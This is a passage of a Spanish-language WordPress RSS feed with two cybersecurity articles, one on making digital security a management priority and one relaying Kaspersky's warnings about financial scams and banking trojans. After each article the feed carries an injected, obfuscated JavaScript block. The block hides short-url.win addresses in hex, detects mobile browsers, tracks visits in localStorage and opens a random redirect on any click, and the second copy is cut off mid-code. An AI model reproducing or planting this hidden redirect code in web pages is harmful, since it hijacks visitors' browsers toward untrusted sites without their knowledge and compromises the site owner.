					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/05/Mara-Maehara-CIO-da-TOTVS-3.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Mara Maehara, CIO da TOTVS" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Mara-Maehara-CIO-da-TOTVS-3.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Mara-Maehara-CIO-da-TOTVS-3.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Mara-Maehara-CIO-da-TOTVS-3.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Mara-Maehara-CIO-da-TOTVS-3.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Mara-Maehara-CIO-da-TOTVS-3.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Mara-Maehara-CIO-da-TOTVS-3.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Mara-Maehara-CIO-da-TOTVS-3.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Los cambios y movimientos dentro de una empresa afectan, en distintos niveles, a todas las áreas de la organización, exigiendo una toma de decisiones asertiva y alineada con las estrategias de crecimiento de la organización. Pero, ¿es la seguridad digital una prioridad dentro de esta estrategia?</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En general, las empresas sólo se sienten más proclives a invertir en seguridad digital después de sufrir un incidente. Sabemos que no es fácil competir entre el presupuesto y la estrategia de negocio, pero es importante que la alta dirección de TI incluya el tema como una agenda esencial y sea el primero en demostrar su preocupación. Además, los cambios recientes que está atravesando la sociedad, como el avance del trabajo remoto, por ejemplo, requieren una mayor atención al tema. El proceso de concientización implica inversión, creación de una cultura de seguridad y compromiso.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La vulnerabilidad aumenta aún más en el acceso remoto. El trabajo en línea trae algunos perjuicios, por ejemplo, al utilizar dispositivos corporativos en redes Wi-Fi públicas sin la protección adecuada, ya que facilita que personas ajenas a la organización tengan acceso no autorizado, muchas veces con intenciones maliciosas. Este es un ejemplo que hace tan necesario el tema de la concientización y la aculturación, para que el estado de alerta sea siempre evidente en las rutinas de los equipos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Cuando hablamos de ciberseguridad, será mejor prevenir que curar. La ciberseguridad hoy ya no es un diferenciador, es una preocupación constante. Los gestores de TI deben estar unidos y contar con aliados en esta batalla diaria. Cuando pensamos en datos, las leyes para protección de datos - que aún está madurando en toda América Latina - llaman la atención de las empresas sobre la gestión de datos personales. Y una preocupación por la seguridad de los datos, la organización de los procesos internos y la adaptación de las soluciones que se utilizan en el día a día.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Además de las leyes, también existe una red de apoyo entre profesionales del sector. Cuando alguien es víctima de un ataque digital, el intercambio de información es fundamental para compartir experiencias y que permitan prevenir futuros casos similares.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Por</strong><em> Mara Maehara, CIO de TOTVS</em></p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/prevenir-es-curar-importancia-de-la-ciberseguridad/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98812</post-id>	</item>
		<item>
		<title>Evita fraudes financieros: Kaspersky revela las estafas más comunes</title>
		<link>https://www.todoenunclick.com/evita-fraudes-financieros-kaspersky-revela-las-estafas-mas-comunes/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 02 May 2024 19:22:47 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[estafas]]></category>
		<category><![CDATA[fraude financiero]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[prevención]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98782</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/05/Pagos-Digitales.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Evita fraudes financieros: Kaspersky revela las estafas más comunes" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Pagos-Digitales.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Pagos-Digitales.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Pagos-Digitales.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Pagos-Digitales.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Pagos-Digitales.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Pagos-Digitales.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Pagos-Digitales.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>El <a href="https://latam.kaspersky.com/blog/panorama-amenazas-latam-2023/26586/">Panorama de Amenazas 2023 para América Latina</a> reveló que las estafas financieras siguen creciendo en la región, registrando un aumento del 50% en comparación con el año anterior. Desde llamadas que se hacen pasar por un empleado de una institución financiera hasta la proliferación de troyanos bancarios, Kaspersky explica cuales son las principales técnicas utilizadas por los estafadores para que los usuarios puedan protegerse.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Tal como <a href="https://latam.kaspersky.com/blog/panorama-amenazas-latam-2023/26586/">han alertado los expertos de Kaspersky</a>, Latinoamérica es una de las regiones más atacadas por amenazas financieras a nivel mundial. El fraude puede comenzar con una simple llamada telefónica de un supuesto banco que solicita los datos de la víctima para confirmar una cuenta, información que, posteriormente, podrán utilizar para extraer dinero. También, hay casos en los que se pide a los usuarios que instalen una aplicación en su teléfono móvil y, sin que lo sepan, el ciberdelincuente puede tomar el control del dispositivo para realizar transacciones. Además, se han denunciado estafas que inician con mensajes SMS maliciosos en los que se ofrecen supuestos descuentos en facturas de telefonía móvil y tarjetas de crédito para que la víctima realice una transferencia inmediata.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Los fraudes financieros son recurrentes, tanto para los consumidores como para las empresas, por lo que debemos tomarlos en serio. Los cibercriminales son cada vez más ingeniosos y esto se refleja en la cantidad de estafas y novedades que aparecen diariamente, algunas muy bien estructuradas y difíciles de reconocer. Por eso es importante que los usuarios conozcan las tácticas que los malhechores emplean para que puedan identificarlas y evitar estos tipos de fraude”</em>, explica<strong> Fabio Assolini, director del Equipo Global de Investigación y Análisis (GReAT) para América Latina en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Conocer las diferentes tácticas es la mejor prevención, por lo que Kaspersky comparte tres señales que pueden indicar la presencia de fraude:</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":1} -->
<ol start="1"><!-- wp:list-item -->
<li><strong>Los retrasos y cambios en la pantalla de “procesamiento” al hacer transacciones bancarias.</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>El retraso en la pantalla para introducir la contraseña o código de verificación en una transferencia puede ser una señal de peligro. Recientemente se han descubierto estafas de troyanos bancarios para teléfonos móviles que <a href="https://securelist.lat/kaspersky-security-bulletin-crimeware-financial-threats-2024/98235/">utilizan sistemas automatizados de transferencia (ATS)</a>. En ellas, el delincuente espera a que la víctima realice una transacción para cambiar el importe y el destinatario sin que este se percate del fraude. El malware muestra una pantalla de “cargando” mientras realiza el cambio, en este momento la barra de herramientas o ciertos íconos de la app pueden mostrar un ligero cambio. Esta es la única señal de que la estafa está ocurriendo, así que permanece atento.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":2} -->
<ol start="2"><!-- wp:list-item -->
<li><strong>Aplicaciones que piden permisos extraños, ¡incluso si están en las tiendas oficiales!</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Si bien se recomienda descargar aplicaciones solo desde tiendas oficiales, hacerlo no garantiza que no instalemos apps malintencionadas. El malware, incluyendo los troyanos bancarios, está muy extendido en las tiendas oficiales, especialmente en Google Play, donde <a href="https://latam.kaspersky.com/about/press-releases/2023_apps-maliciosas-en-google-play-registran-mas-de-600-millones-de-descargas-en-2023">sólo en 2023 sumó 600 millones de descargas de apps maliciosas</a>. En caso de duda, siempre es buena idea averiguar cómo descargar apps desde las tiendas oficiales a través de la página web del desarrollador. Revisa con frecuencia los permisos de las apps instaladas en tu móvil, especialmente aquellos que son sensibles, como el uso de servicios de accesibilidad, permiso que siempre se debe declinar a menos que sea realmente necesario.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":3} -->
<ol start="3"><!-- wp:list-item -->
<li><strong>Llamadas o mensajes del “banco” solicitando información personal.</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Las entidades financieras no llaman ni solicitan tus datos por mensaje. Si recibes una llamada sospechosa en la que te piden marcar a un número desconocido, descargar una aplicación o hacer una transferencia bancaria dudosa, no lo hagas. Hay varios tipos de fraudes que parten de esta táctica para dar credibilidad a la estafa y convencer a la víctima de que instale un programa malicioso que da a los delincuentes acceso remoto al dispositivo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para ayudar a proteger a los usuarios de estas estafas, Kaspersky comparte los siguientes consejos:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Si sospechas de un movimiento en tu cuenta bancaria, <strong>ponte en contacto con los canales de comunicación oficiales de tu banco</strong>. Estos pueden encontrarse, por ejemplo, en tu tarjeta o en el sitio web oficial de la institución.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Nunca des permiso de accesibilidad:</strong> todos los troyanos bancarios modernos necesitan esta autorización para funcionar. Por otro lado, esta funcionalidad sólo es necesaria si la persona tiene alguna limitación física. En otras palabras, si una aplicación pide esta autorización, es muy probable que se trate de una estafa. Mantente alerta.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Activa la autenticación de doble factor (2FA):</strong> protege tus cuentas online, especialmente las vinculadas a medios de pago, con 2FA.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utiliza una solución de seguridad de calidad:</strong> herramientas, como <a href="https://latam.kaspersky.com/premium">Kaspersky Premium</a>, impedirán tanto el acceso a la web falsa donde se descarga el troyano bancario como su instalación. No te confíes y protege tu móvil de la misma forma que tu computadora.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para más información sobre ciberseguridad, visita el <a href="https://latam.kaspersky.com/blog/">blog de Kaspersky</a>.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 